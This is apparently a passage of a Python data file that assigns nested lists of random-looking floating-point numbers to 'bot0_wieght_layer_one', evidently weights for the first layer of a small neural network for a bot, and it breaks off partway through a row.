bot0_wieght_layer_one = [[0.4935829386124425, 0.2486496493340803, 0.45287661299189763, 0.6228461025230169, 0.0027775129778663254, 0.1708073345725104, 0.519667083534109, 0.23366912853189226, 0.6139798605829813, 0.5293127738090753, 0.6567206010553531, 0.7435351945616345, 0.7015167444631532, 0.14995488489543307, 0.49757715012556913, 0.6467561172865255, 0.9212538365848113, 0.9464065946119674, 0.1494875222787766, 0.9374752317574573, 0.8777464069792369, 0.24138691456024552, 0.7659384349754291, 0.23907929821233243, 0.1974608268069732, 0.10894582625681126, 0.29590811102063685, 0.2755027447113222, 0.5714771489142544, 0.6741393616198518, 0.27276833671926914, 0.40956050296998925, 0.5601713861500712, 0.3977876756089196, 0.6860214004559976, 0.34268073370731345, 0.2214141828696149, 0.2591938889185762, 0.2531258881187268, 0.8684768630107501, 0.17145384500261585, 0.22703094455185646, 0.22988958138771332, 0.28257358113352504, 0.23236230350846399, 0.6778707921299, 0.6800663866609751, 0.10922044222693428, 0.5533836878503431, 0.18017517533780059, 0.4377719059983647, 0.9288555179080915, 0.9895973711676155, 0.5207299338191543, 0.7816416008332766, 0.8033630042935214, 0.2949120458711081, 0.9395350494922458, 0.5452844974969201, 0.18828673666741158, 0.3556973847723065, 0.48373068150432974, 0.5933519209117005, 0.6607122209252013, 0.8244201515622804, 0.7964115959146899, 0.3874983399168205, 0.5416066464002153, 0.8208004891451057, 0.6645576910224514, 0.6876020881680511, 0.45938928779923693, 0.6717717630348377, 0.16179056884149523, 0.4357248259091525, 0.4715875608302854, 0.1272244208695038, 0.7821650215339843, 0.5685604479312912, 0.37968938378518224, 0.9493607211090185, 0.2130838160830899, 0.26713485063249787, 0.535787068877412, 0.01264876309930607, 0.6698989857156539, 0.3977478318725206, 0.45957628269449735, 0.6914270807135725], [0.7193637876414529, 0.0992370467088417, 0.9553963535264431, 0.07349401110719789, 0.14649143977623225, 0.1349818835701132, 0.31070206117356125, 0.8273054256746405, 
0.7927523497649491, 0.14898648772530132, 0.3431433649663693, 0.7584252555947238, 0.07138219505921417, 0.7982261554220401, 0.5969487571193092, 0.7116252207283739, 0.06908825367375071, 0.5029014967375591, 0.7232649520612549, 0.5126898591039302, 0.26277738837470743, 0.01938268160513401, 0.11517287833510681, 0.9213610625703276, 0.7532821937865147, 0.0030724783216599105, 0.5776485433220746, 0.04222852125489707, 0.5160244705250624, 0.16879757444696852, 0.14372495242428995, 0.2430342230586282, 0.9504957276394339, 0.9318008865656332, 0.14053527002616661, 0.039456272235465106, 0.7661393635325146, 0.8340559897373588, 0.8228836411797477, 0.13344361369477764, 0.5882990207970006, 0.2491980635558816, 0.5689985109623916, 0.27492406765221833, 0.972985313727772, 0.5459795617278855, 0.1517859370942427, 0.9327882617192113, 0.10270045453581511, 0.5754703833904119, 0.31389666323349485, 0.6644559957621139, 0.001369498203934283, 0.2418890569039206, 0.5853723046789586, 0.3449096652651481, 0.49202949283135167, 0.5198238199109231, 0.5909363956617113, 0.21658291103098126, 0.17180674994524825, 0.8283196587280093, 0.4874484763898551, 0.6827234220428773, 0.2161710054730458, 0.4558301101165271, 0.4559599226653992, 0.24840691676792048, 0.3619063394969213, 0.1967413337317815, 0.6504305538704975, 0.40937850135244747, 0.3389617844371956, 0.7508287044495914, 0.5301956779511247, 0.2661240219568354, 0.5093468383541764, 0.587679942584075, 0.9524792119580612, 0.7804517256199596, 0.7638572895572304, 0.7662360273323294, 0.6187785808885176, 0.7135688938462813, 0.7392352347465704, 0.09103694597008893, 0.4982498867230458, 0.23109479445040293, 0.2821689253684987], [0.6307617053678217, 0.5039768955610341, 0.49688494110612225, 0.233248088660867, 0.8611032914321372, 0.995195135988468, 0.0849380582957151, 0.8204164779863392, 0.36646458658504966, 0.34331646333650834, 0.2230130181447716, 0.9179849442046781, 0.45633296658757483, 0.9375850657995864, 0.22980780108971255, 0.4449945646771951, 0.14519144694104857, 
0.6820733220059508, 0.23004413430220172, 0.33232001354222684, 0.9914225389113916, 0.23343443636343075, 0.5292096497593496, 0.36458139641715326, 0.25843801690928736, 0.9183184242563015, 0.49968017398211506, 0.7791952792855735, 0.5771798199343583, 0.834773325230387, 0.158486962686607, 0.9321124693197719, 0.47991120203491633, 0.00355305455109034, 0.7541318706217435, 0.4523223838480157, 0.5720577659529087, 0.7178140987736153, 0.7131922781863729, 0.8801487642262241, 0.831230070306996, 0.765348729576048, 0.9859758441926465, 0.09592909415269191, 0.32629146879764814, 0.5692665970088389, 0.9246097779483797, 0.2795565950165342, 0.239727498643875, 0.10371267545976004, 0.3061994511275228, 0.8895000028399908, 0.41275819255722945, 0.20918068323940497, 0.9847102077342237, 0.15231664837576142, 0.44196475121426115, 0.6545234911619475, 0.4058345087343399, 0.5747518701252684, 0.12988783108698232, 0.19180937677963128, 0.9969572094336052, 0.20766881687737793, 0.006968626661159494, 0.020775547418627305, 0.44569050307806346, 0.4581111327905286, 0.9015444263189981, 0.06349318827967398, 0.8150709815870101, 0.25593581891438044, 0.526041725095255, 0.6467238688319615, 0.03816486866961433, 0.03720944439521279, 0.5817414059838383, 0.34452234951971183, 0.21890071128992916, 0.36649741728793583, 0.0726963263369732, 0.17968363978040258, 0.6004827139014633, 0.4672035234869465, 0.18079269935538467, 0.4508015188204938, 0.5016796189632033, 0.7375660536611205, 0.7020508381468571], [0.8084796921459246, 0.27384435108470273, 0.04828876067981014, 0.07379447508827885, 0.0634108087420916, 0.38898621921409327, 0.1975682335792437, 0.9277433137720225, 0.4083270100245886, 0.8075504540560292, 0.8784568942912847, 0.4076827922104673, 0.49354254143539655, 0.3571369822502426, 0.8979031458841475, 0.564765561543932, 0.5949020939365928, 0.903108586137933, 0.39225531985484785, 0.9947503812885181, 0.8994092905858401, 0.01212376297070672, 0.19562268718123987, 0.6650875457560252, 0.6196172020152799, 0.4951005095683715, 
0.5456969665769195, 0.4704651880528081, 0.5423633232108106, 0.658789852304124, 0.15629908018189764, 0.51998129446808, 0.8386700672339286, 0.508600283133679, 0.619147264631436, 0.5637459268225825, 0.6764104508177909, 0.6430456271248974, 0.6244071412803961, 0.3449575584822505, 0.12761689425008071, 0.6902008573767218, 0.7309553767039909, 0.5791615423447679, 0.8544816081150577, 0.7828211086457072, 0.7360388275155082, 0.7975914095356994, 0.3352701671445214, 0.024702544642475344, 0.41775624527161426, 0.6533780336738035, 0.390605808091781, 0.2947421325289511, 0.5680345674803116, 0.4054081381343654, 0.18911037212318138, 0.07442571380311647, 0.1948931566820159, 0.3843785336151123, 0.5452617701603052, 0.2765672109742833, 0.6498019672515245, 0.07513905717716296, 0.9487728791396083, 0.9558576513915418, 0.6518256962971827, 0.7407995312373189, 0.017609879057417843, 0.31600691785041557, 0.1953804804210122, 0.16784899887419402, 0.7602552995267425, 0.9442077092314616, 0.05750785245504586, 0.3577318868856184, 0.19615509111309404, 0.05255054260591452, 0.556125963219633, 0.039672098132271016, 0.5407592261677879, 0.14510961174947734, 0.8595294806356243, 0.007519941000603159, 0.23134208436579118, 0.009295627659115069, 0.37093073175217983, 0.9755178459945021, 0.6902618683547788], [0.7515916770913621, 0.19076293301681868, 0.9724612308724244, 0.24485048224447148, 0.21776297767506825, 0.6979260099671111, 0.6262352317845318, 0.396331360047384, 0.37139235519485436, 0.6857600987954712, 0.8760528855940635, 0.7093571083789698, 0.45132233953038925, 0.07189694392471246, 0.33863587068005996, 0.11579690461650582, 0.45013539278377446, 0.34541303911605425, 0.9221230982016599, 0.2905400473664146, 0.24727262997549604, 0.9870200589036876, 0.9084944322018474, 0.7242701978048289, 0.4659345439649095, 0.8660442364919892, 0.8098616675802133, 0.7388936586997712, 0.018736126705306888, 0.5353097532136029, 0.8923493688264574, 0.2052888473077552, 0.44456706342205476, 0.8590036849696138, 0.02897542662910524, 
0.10163304116852212, 0.3007604746545479, 0.33643848583124947, 0.9456454702189252, 0.5903693067189846, 0.2954408452960273, 0.38338738824239516, 0.376853763925345, 0.9743909557268259, 0.4545644898979583, 0.8150166089174296, 0.4703057345359518, 0.3121470342307563, 0.0794768278722564, 0.5597112784531169, 0.3861810059301165, 0.026008490169801113, 0.8893971474684071, 0.2000975269082993, 0.7894632707819295, 0.764386236417529, 0.28096685288930157, 0.6964626379563548, 0.4634682569744447, 0.6771319255007053, 0.6993217238532895, 0.02043804303912955, 0.6949305007936956, 0.36262517601094235, 0.5055131343837771, 0.02258293509529019, 0.6556601979412826, 0.19680608294757218, 0.02743764736784493, 0.02969007648043498, 0.1372985596271562, 0.8193774049370306, 0.15997440351459458, 0.6358339070318642, 0.5779272113926737, 0.6727105093776348, 0.4896078388766417, 0.7866559504612134, 0.11260240929990262, 0.2770521740041859, 0.6424684466014499, 0.41254606191261567, 0.4487637282821766, 0.11863081520464314, 0.5532506065793558, 0.5450635551026698, 0.8816355400542084, 0.48472093020171003, 0.32569399187823744], [0.6206390788465699, 0.15779237637789612, 0.21131516025631103, 0.4181091020583977, 0.7187169078015069, 0.25660608387264994, 0.7629877733711614, 0.8242310164104012, 0.7186012070853081, 0.8810107738386127, 0.2786977575452376, 0.7856727332845536, 0.46760242349383296, 0.3901399212854706, 0.6600874926899676, 0.5307039766574495, 0.43637800915700586, 0.8230846676622585, 0.5136284517330398, 0.6925308821867903, 0.6667245042172921, 0.3733928159072639, 0.2629739630344372, 0.2676959086077685, 0.9786531225694579, 0.6918954569467168, 0.6984135381664444, 0.23932646582781236, 0.7813009207359639, 0.8952541144588478, 0.9878652314824834, 0.7662646400885289, 0.4880895313996474, 0.34422975171596926, 0.48045763268994646, 0.8531853356443303, 0.34948862847711215, 0.5532718561129788, 0.7237406705693429, 0.6423426398961657, 0.5367442637567288, 0.9930495395476565, 0.5812265566655564, 0.8834030149496938, 
0.5089176613300826, 0.5570859934245764, 0.327970177402934, 0.27108400010835576, 0.5385052092078001, 0.010172494401844312, 0.2941161377984163, 0.3566274380039244, 0.6417611976665807, 0.015233035749627422, 0.15432959719251482, 0.7755262553901066, 0.032389772688557805, 0.06806606718510955, 0.08995097665279084, 0.4390303036116959, 0.40775487648065567, 0.06191776180827602, 0.032239488086460044, 0.0465809472880544, 0.05306952361507633, 0.702227484395934, 0.20119202751844378, 0.6164153918528726, 0.837723562947728, 0.8479572657761094, 0.796053685229654, 0.10772590325258236, 0.9474396938854628, 0.7736585883287718, 0.5438552214806078, 0.3383450470804178, 0.7179972926794828, 0.043455353113848516, 0.07307430768150946, 0.562889225083367, 0.6889954260785377, 0.8614408593018704, 0.5115537714815056, 0.4968824244996112, 0.46983558129631464, 0.17744032179201075, 0.5907495142815318, 0.9195933831314489, 0.8735276724592762], [0.0546289083365703, 0.558349663042936, 0.15825535553513181, 0.9618931212394518, 0.8872542678975858, 0.5127525207563902, 0.5457354463589071, 0.2700125118284086, 0.3013639442808279, 0.5325217166520552, 0.9077326637168593, 0.6757894178859548, 0.3381877977879265, 0.6551205097042354, 0.05590749788383742, 0.5932361454972053, 0.5498149052212652, 0.8227116797935435, 0.46657840573105436, 0.6563405248201772, 0.540158964519292, 0.37568635362775615, 0.5560951022107695, 0.6302755370353823, 0.22231087579194098, 0.2444999618734689, 0.9831332343113387, 0.5971691598347817, 0.35578808697631326, 0.8193982087721026, 0.7283459464309779, 0.7139739441446002, 0.19418688227724468, 0.30489989756770275, 0.9609736581114511, 0.5544744067506779, 0.7430031641433703, 0.544693263984774, 0.7175315334633071, 0.9915668960320091, 0.12210958461939314, 0.7794151715953662, 0.710388192426428, 0.23539858340069109, 0.41388209624699746, 0.6278347624476572, 0.7717660602832401, 0.03522761704912314, 0.5861845660103372, 0.2684057424863554, 0.03149407644672708, 0.2588168846648018, 0.054137461534030096, 
0.35248496541068475, 0.5626731346053994, 0.21015973389136244, 0.1397889183927834, 0.424991922082283, 0.583985614502307, 0.7135488598397892, 0.1534651642055319, 0.5278283431092786, 0.817234291791, 0.6865669475520276, 0.8400956483432387, 0.3553410125422114, 0.5621639344730354, 0.7528983577284845, 0.052279502113401155, 0.24374904182536383, 0.9800338202217856, 0.4537503178299366, 0.9298064153655025, 0.1922793143927708, 0.14169852856764853, 0.210400358988438, 0.5010774881007007, 0.4791754121125693, 0.6096271376656784, 0.6038961372430545, 0.2655827722582237, 0.2849625798378257, 0.2891456987207267, 0.25869681116902743, 0.8402635963808085, 0.597930370104968, 0.4531779957213572, 0.45884061134540544, 0.3200715039313814], [0.6449979181869536, 0.7537087778489473, 0.4355357403684108, 0.1653029528150347, 0.6411699114989015, 0.7894103672482641, 0.49146367396599766, 0.22201564692883125, 0.6758416727855281, 0.6365589752449248, 0.5976223981420056, 0.11397677756033353, 0.8678894794929654, 0.5489149162326091, 0.1320913889326668, 0.1761876377265491, 0.2456472210392775, 0.5071343860460336, 0.12173113138329161, 0.3460573095759334, 0.7932912935281833, 0.40156538892521376, 0.6878982044742583, 0.08788185079316602, 0.967642517000846, 0.3193569798656798, 0.8203692954126408, 0.03330924787218015, 0.5884833942382952, 0.7433823187670109, 0.8994862799322555, 0.32108355294375235, 0.3194039594871573, 0.6551340739044892, 0.032036616022942166, 0.8339182240064208, 0.5578749772339806, 0.7434501811910013, 0.1181786329998249, 0.35567638766996845, 0.15909391248334748, 0.7805318692770543, 0.09201493982939113, 0.7997352788424174, 0.5920601477012399, 0.14332776393780922, 0.16934024262973946, 0.10017601265535336, 0.9136376625583517, 0.82220003509573, 0.2643657238072461, 0.13522021672390594, 0.0854882122753382, 0.8152975531755637, 0.7916282640902562, 0.07074332696930219, 0.3402600433130857, 0.197180017808543, 0.20840594516471267, 0.8312832788707185, 0.6701839726455112, 0.6610886893725066, 0.4871042142318207, 
0.12836095160598804, 0.9679120345136163, 0.2735949330763191, 0.38989674721480283, 0.18688513778581262, 0.010522684069685817, 0.435885829221656, 0.11514317725584045, 0.748681302157351, 0.4055849069571943, 0.10176543764214563, 0.7755912387870274, 0.7684358983999376, 0.05205854352667505, 0.5926285117320772, 0.05538559053895897, 0.6705850558653481, 0.525808678150547, 0.015039249988264558, 0.5683648697727853, 0.3152331729103166, 0.8852519201014608, 0.3980075092670442, 0.33327264262547684, 0.1766876281967218, 0.5696903578969622], [0.852855362237091, 0.3489673869003813, 0.060210554520977455, 0.5160672954650956, 0.014806320022740516, 0.618494871970543, 0.42538119636646754, 0.15331757244702304, 0.5830386093601294, 0.3364557699391797, 0.36911857648555835, 0.7258019489442413, 0.5641455202209722, 0.6617181806499098, 0.6825008705530258, 0.2331834335613704, 0.7324970698114482, 0.4688508908581652, 0.5393597344151229, 0.5711567202501522, 0.32168802437252997, 0.5054283902885031, 0.6541136461385909, 0.10315805881361151, 0.7942600601996802, 0.7623847692535421, 0.7001011692059321, 0.02393794386395487, 0.7415463101079897, 0.12395013597084592, 0.7830740204350577, 0.7657156610504737, 0.15653996473986698, 0.058401657937124374, 0.4859615161096251, 0.6203415489995264, 0.18231948698111056, 0.6831265428943796, 0.10554251593136443, 0.5966174330203512, 0.10409882425737593, 0.6745510750636352, 0.38708456789893886, 0.031144356044847443, 0.40595073305613627, 0.3824022896388237, 0.03352900725879093, 0.8088597882267266, 0.09861542641380372, 0.2770971576586013, 0.08624006901653025, 0.6225345105641247, 0.6753091873022377, 0.7911677894857897, 0.16016663479353332, 0.8713391780389429, 0.8226006131052581, 0.47691971164364344, 0.8359772768587981, 0.5990128093564864, 0.5496498233061545, 0.12585457660296862, 0.5399810000445523, 0.11999449906891335, 0.3414656460717661, 0.659244818142472, 0.1857382068352479, 0.745757191701968, 0.05655708086692768, 0.4035256197605007, 0.4845712115939569, 0.05106942982466944, 
0.18999708692748496, 0.48217218355658464, 0.049974652418595666, 0.41441990127013206, 0.007128582927215854, 0.6371548472680038, 0.958648107475411, 0.4968565956831469, 0.39852466236801365, 0.8374765137840612, 0.9774644328877298, 0.514993251213521, 0.3156588902420381, 0.35399903807564304, 0.4360800416963432, 0.790572793594285, 0.8783760840520749], [0.29209351565102903, 0.2613110568723238, 0.627841790178802, 0.3185240640233834, 0.6107951449096153, 0.7022002536184426, 0.13923415301508346, 0.18696267607052486, 0.0013353016455677214, 0.08427265363918113, 0.04155204306282534, 0.3348230805497767, 0.584541742629576, 0.9775880865690801, 0.684394543366014, 0.9353228955624147, 0.7995931730957554, 0.1910486218472781, 0.19158260697575824, 0.33112647799896855, 0.5597615183085528, 0.07015117133321214, 0.3455216155783575, 0.6353004792958964, 0.8724755009459306, 0.34906760936840076, 0.409831641647302, 0.8137835581688054, 0.2587393141704979, 0.9805340841622704, 0.21201486432551786, 0.1225957557457723, 0.8916889438981283, 0.27607592281051785, 0.02684113718626291, 0.29899698428992905, 0.9518132368989032, 0.8807749712654713, 0.9507555510866927, 0.7038194748248106, 0.921936041622217, 0.28256371323435103, 0.18545867577880437, 0.34048702627610783, 0.9149770577368989, 0.12601100500051865, 0.03686722620988925, 0.4990085782257805, 0.3791274393764785, 0.2807573250122306, 0.4918550796119098, 0.0962404010669694, 0.30395976240341416, 0.7353890109946843, 0.363304751285513, 0.3513317697568624, 0.7264693179845169, 0.044873166048283064, 0.5602841836259258, 0.3562408043414741, 0.8433130591720878, 0.9339705125486716, 0.40814911821063604, 0.028112618653614696, 0.42845019137435747, 0.49908816583149374, 0.6076534743219487, 0.5570706623653796, 0.28248673904186883, 0.8241581828398685, 0.44229271378690704, 0.8805206567290171, 0.2593134086643706, 0.416947604274874, 0.44841108082193715, 0.3484341508883171, 0.11565087472578339, 0.845271017187261, 0.8713685203399029, 0.5536126401296754, 0.307066219685433, 
0.5301400044225715, 0.6403258475666596, 0.6943828491384205, 0.8651570373678039, 0.8982271346718131, 0.8436915891812184, 0.5525385212406779, 0.7125795112583939], [0.1081345186656858, 0.13972672795268226, 0.6612190830420255, 0.08003312266113671, 0.5255992460143822, 0.5733613114721169, 0.3763627260853003, 0.8289445265525545, 0.4274037233155472, 0.49067555529421025, 0.5839845772123975, 0.6028366772633202, 0.66733454278173, 0.27361521023098434, 0.3589981325175614, 0.4513673830878183, 0.4384593051098109, 0.8918331719256631, 0.40725033989925086, 0.8034711913719191, 0.18394532562929533, 0.7105834862899493, 0.3525708001013472, 0.7385976429171252, 0.8892383078570366, 0.5653826795081124, 0.7759997670448197, 0.009003702014654835, 0.8323202969103849, 0.24207884095230658, 0.7046742148508904, 0.46738538578613475, 0.8202997097868907, 0.6182311691649204, 0.3583858604833069, 0.8770693135168892, 0.13990386427362678, 0.02618427538017909, 0.9991153968125737, 0.25971563954929566, 0.16173387774691195, 0.6400155308141301, 0.6038255285999398, 0.9438924928993894, 0.7503813205027573, 0.709069610233807, 0.2734666899536081, 0.5452505003359798, 0.8376718283390543, 0.610163129593307, 0.2605550634958167, 0.31202184232010777, 0.1817239355714757, 0.4205493016917996, 0.7891647273583858, 0.9656038032836223, 0.9030128216932363, 0.49517638427559674, 0.26230808332249456, 0.322108142002422, 0.5045095105290113, 0.008813154827022829, 0.6343611248536449, 0.5748081403704774, 0.7139879215681911, 0.5880615856730497, 0.39606126658417495, 0.593234557397728, 0.02991327229997598, 0.6442668348283038, 0.5465556128360536, 0.565482830500383, 0.33607783552203196, 0.17057007877252295, 0.01600464493881837, 0.7420997160934591, 0.5623533041388137, 0.46628939589702745, 0.9275544271450908, 0.716840911571936, 0.4347972587573298, 0.259859383888161, 0.34863697386472736, 0.5578581532726113, 0.6433042031621901, 0.8558142307860244, 0.3796917695178348, 0.31603093694017625, 0.9640383804127571], [0.2209509606434924, 
0.7352710873027777, 0.2812177995150251, 0.1527795829798827, 0.943137344275536, 0.28228585423683383, 0.6249360425585961, 0.5731098462035533, 0.6868495897175008, 0.4223622087394393, 0.46043719327949173, 0.27255545391247116, 0.7825619808796317, 0.3375707766927032, 0.3397434184597894, 0.9332332046951965, 0.2863463021484486, 0.4775764666489555, 0.8944469904841221, 0.41528473921694553, 0.6724129142509918, 0.8283123432167213, 0.8560800658654526, 0.28453618777764356, 0.08599001190331457, 0.2998894429999692, 0.040410965394726994, 0.41571348815690645, 0.6559170522804373, 0.4639710057181279, 0.8207416738602958, 0.5432988439491655, 0.3996005791871009, 0.8886347638989692, 0.03257397682622121, 0.43573432395106415, 0.9026969550506334, 0.21562793864337781, 0.7440023550944754, 0.06623095385649902, 0.7553020049469407, 0.90005628516542, 0.010370764944694133, 0.19408850783338671, 0.34436933475889964, 0.7908350479616723, 0.12090884657661738, 0.3300196971390036, 0.9674267494172797, 0.033337933410122256, 0.8992483459377145, 0.9462808678327074, 0.2503623292156073, 0.4540352696485782, 0.21195369779733486, 0.6928865838321636, 0.8781932581019375, 0.0878483319411113, 0.6057078898390805, 0.15987352668355193, 0.4043379634587394, 0.13378959925065403, 0.1554722215122255, 0.7438940014972566, 0.8336690352294047, 0.6877734243478287, 0.9981056865172598, 0.37272155247430694, 0.37794604849085134, 0.9102485932649641, 0.7948893902036331, 0.7062565633546044, 0.35002910400391785, 0.800268577049325, 0.6722942185990822, 0.6930811231019787, 0.5726537666219839, 0.8030662994610022, 0.5338031175804704, 0.47510401586952977, 0.0998400549320192, 0.13813271817429318, 0.3499122796110664, 0.9080935911461205, 0.45951997032338987, 0.8352899530549001, 0.9161395355599374, 0.39359783724750497, 0.2612456013064707], [0.6549332078297421, 0.11578840859849782, 0.6144233694815883, 0.853900835685418, 0.1772070074990425, 0.4436508005645151, 0.4659796469903006, 0.03503779074687596, 0.9165319216565287, 0.5135370730464691, 
0.6764984811339175, 0.18040547648363014, 0.2824135754503184, 0.6065007596792297, 0.8818748606694501, 0.9608461136638341, 0.7478342244538672, 0.5263224500503494, 0.37728242093697817, 0.09484031951679683, 0.7976311156011823, 0.24809103661726006, 0.30795204361475137, 0.5280421232364688, 0.30597987850015773, 0.3009004832619777, 0.4554960440183139, 0.07042701441135224, 0.6082196813912009, 0.8970281835272063, 0.27935913031921933, 0.5363561952778932, 0.8143598458464354, 0.089973700502332, 0.43145925634301274, 0.7779239125632348, 0.8874698901841058, 0.8218393411555373, 0.3299902058395041, 0.3665763017326201, 0.504076530115492, 0.6024665816303256, 0.6943095650669523, 0.9042127472560082, 0.6781092808931114, 0.7189425458741606, 0.4436296813589261, 0.6954238947292116, 0.9295454750505411, 0.5500195917385867, 0.7611291949638219, 0.4459883107405097, 0.9032762371321768, 0.9964840309078788, 0.6379748081692435, 0.9933374579097973, 0.9482688166669618, 0.7173672274160209, 0.8604968349225849, 0.8517363270038851, 0.08901117438365425, 0.3221061724953582, 0.9472852165876785, 0.35709440621740063, 0.22750737714795177, 0.03856667915238654, 0.3114918076235206, 0.8169779643438189, 0.47492251609082703, 0.49682984455876666, 0.15241573061950098, 0.6343903536716372, 0.11244139745442161, 0.44712955429389745, 0.873293293163993, 0.5248471820945273, 0.5612706553910557, 0.5910889073266472, 0.09636306716566723, 0.04650512928158601, 0.41290398095203784, 0.589407576287586, 0.22917692043896443, 0.5262836877885642, 0.5666944817246194, 0.39661751781132437, 0.8665615289862285, 0.9013868297334956, 0.1883508235290393], [0.7400104221993781, 0.630226036085156, 0.7514656105832032, 0.9865243410286294, 0.9342760013156045, 0.18177435800818809, 0.4195551443378924, 0.7553172328536675, 0.10554781970624305, 0.3521364850630867, 0.47226736417948045, 0.7775503340432989, 0.12296730584761417, 0.6601442424514967, 0.7778847558290984, 0.4585801700662131, 0.5531461262074561, 0.16951267366644074, 0.6225864124797916, 
0.5144435464648989, 0.439122673216671, 0.1548261734121653, 0.15905808633499718, 0.7187280409616313, 0.7672393543400453, 0.5730798082845486, 0.30982870420494, 0.22638960606778025, 0.5589239562192408, 0.8357130227246332, 0.7207527854404117, 0.5161564375142326, 0.6951430518845073, 0.8966845403603594, 0.7132248896162114, 0.3085983322319481, 0.9077479373038442, 0.14703442242399523, 0.3886109483365531, 0.781904505649272, 0.6569009985698672, 0.5625163445592909, 0.09799982864254342, 0.5027000359241472, 0.7248639268748484, 0.9658625964452395, 0.5447840949418569, 0.4338794748436795, 0.17633623581743463, 0.07538033466959326, 0.8519967394192751, 0.7607216287573955, 0.9709519912242048, 0.8841756433079573, 0.13312201934769163, 0.22202898207524902, 0.9336611451737946, 0.5673783164988164, 0.5153027215928156, 0.13399055515153857, 0.1319808061482567, 0.6631717387530299, 0.43390258616011756, 0.33692459307657807, 0.7139774647530446, 0.38450981335455336, 0.655222586663236, 0.2937450474614418, 0.9845797522375724, 0.6564134354752074, 0.853228651598781, 0.3248486574821762, 0.7737508712141865, 0.7917891657687525, 0.693731159228003, 0.9994647986604203, 0.40499352152184676, 0.3197053008961218, 0.8215272133442786, 0.35357223681594263, 0.455574877198215, 0.7081401568628769, 0.9508455706946498, 0.8656391686204462, 0.1699772268264903, 0.2644158066883261, 0.4237792652518484, 0.4634932523788545, 0.058381268414249066], [0.6282527515347706, 0.7082375319356012, 0.8294834585514687, 0.7850529880097666, 0.6157637758097978, 0.08952945985222227, 0.14843645240944714, 0.5123444677911833, 0.3941302214553266, 0.6034888205738849, 0.6866146311222118, 0.17754266984415612, 0.9439369940188265, 0.8397102774338101, 0.06598743384380201, 0.7356135145139736, 0.7984550895290117, 0.07500782159956842, 0.882529485687207, 0.6156505464235636, 0.26394295318210315, 0.23472315277675104, 0.8424789759191136, 0.500490692323112, 0.45358817896965653, 0.7366979730968164, 0.22458762123770093, 0.7100399830186281, 0.3180718927431502, 
0.6180618071368218, 0.37921045598210545, 0.8127224585057631, 0.6116812338670113, 0.405769948640344, 0.9513417488224132, 0.5522957251080056, 0.2935429390837918, 0.35761721039477035, 0.5065314583867527, 0.6094675263380969, 0.03849683057100828, 0.3432058092227541, 0.08000671698890327, 0.9331835053010694, 0.5637975952835825, 0.6480704938071198, 0.8459866307259181, 0.2135636947971823, 0.09211894050482883, 0.4612572887479546, 0.9462735340504043, 0.637120678926244, 0.05235236356847306, 0.42190507941618893, 0.5090960789929788, 0.9212569764746177, 0.6034188684085509, 0.4799339330251686, 0.09273265401689201, 0.23181968957552834, 0.23868435379203812, 0.9968746761819873, 0.28755548229608285, 0.3714057891358449, 0.07425062115339931, 0.3651478130176493, 0.6036967846484682, 0.7991726080736247, 0.971291820772433, 0.16160256647677618, 0.7903624967685605, 0.1412354754440447, 0.12660709249074475, 0.010077238979253389, 0.23722006648473482, 0.4163461080519334, 0.1639194461620429, 0.26266296260438593, 0.45330327693987726, 0.9214691369319028, 0.7772667376255449, 0.1890648116447483, 0.3287170245229647, 0.6866390662654077, 0.20753106255170317, 0.011574693585364115, 0.9789652007042667, 0.653005721239906, 0.4975431114419263], [0.49657648675657773, 0.4744558132153889, 0.5455397555082582, 0.12920566509980902, 0.99434011616237, 0.6218836447374883, 0.725487357090924, 0.7967121970586566, 0.7537924864449075, 0.764723357235154, 0.24028795476745823, 0.014911109533143674, 0.9108524197681788, 0.294423303215784, 0.8977013554799926, 0.31551913981311586, 0.3598957769974983, 0.3751336886770198, 0.740404005799475, 0.5353805868246057, 0.5503084038983947, 0.8618458611595128, 0.23331207463810055, 0.4941146930966145, 0.6890338851088279, 0.3891494321009462, 0.7918898138187324, 0.11723791313564214, 0.43403988225200874, 0.41823078128769753, 0.49505727927361487, 0.5085346558616808, 0.6414078007591949, 0.4366806696636688, 0.3278269369319383, 0.6939884806151422, 0.7063666120990798, 0.37580624107468663, 
0.044488369193373956, 0.7476613189248547, 0.0009115943936399695, 0.8552137293452866, 0.550116218897352, 0.6605343140369605, 0.29516892427677044, 0.4644970808470412, 0.4838384958546975, 0.7610015038305113, 0.17014707096096848, 0.872840410226839, 0.8839353215624173, 0.4723460862342893, 0.4894929953194648, 0.23888839064139777, 0.625140068432814, 0.9355477477963459, 0.3920841407439285, 0.5451429987765117, 0.36482553999961864, 0.9102257522522803, 0.36007943539261855, 0.4852099251126085, 0.15117034149260333, 0.5412567134212384, 0.13666989591681444, 0.6770969068068703, 0.9788163005673264, 0.8606412028453266, 0.033911283328816544, 0.8340323867755288, 0.02303011418368439, 0.5585995781868467, 0.7352789685946791, 0.1438299567281247, 0.05154466373980282, 0.4037524293937569, 0.9057114101479112, 0.003824910713708052, 0.8625558517919276, 0.6338975088265412, 0.2929056403143112, 0.1024212928983883, 0.5986460066947908, 0.22972405711813892, 0.7323366226996115, 0.07292650066047812, 0.9293647630545293, 0.5668289135380598, 0.7359472779104181], [0.9644480153418049, 0.41928687240850604, 0.9611573939613701, 0.71592971409076, 0.2205136357615638, 0.9112093764398144, 0.5499476258871991, 0.5168858534130215, 0.17133520916153577, 0.7602970352783872, 0.5074254956425938, 0.6777170751805602, 0.08077029055701845, 0.43878777412982595, 0.25287748245188313, 0.9614446458266445, 0.3639253211423681, 0.05256271815519753, 0.6148691415103924, 0.2487419375990334, 0.35824154600250435, 0.9067019944167994, 0.05877616874843972, 0.006354431890934764, 0.2179743490315822, 0.6954430389905436, 0.18892235116789324, 0.5232146398335236, 0.406662346922371, 0.1009900605373163, 0.2265708112589233, 0.34193863483074516, 0.6526686904982149, 0.3244964680949547, 0.8402864048040822, 0.4559846292452603, 0.30094449334399975, 0.5318377308194979, 0.7866497659173006, 0.18531010950606208, 0.2719305706421865, 0.37145072644545507, 0.5178885544863067, 0.5936046787898941, 0.2778425374846488, 0.6049458200493162, 0.5807706026711047, 
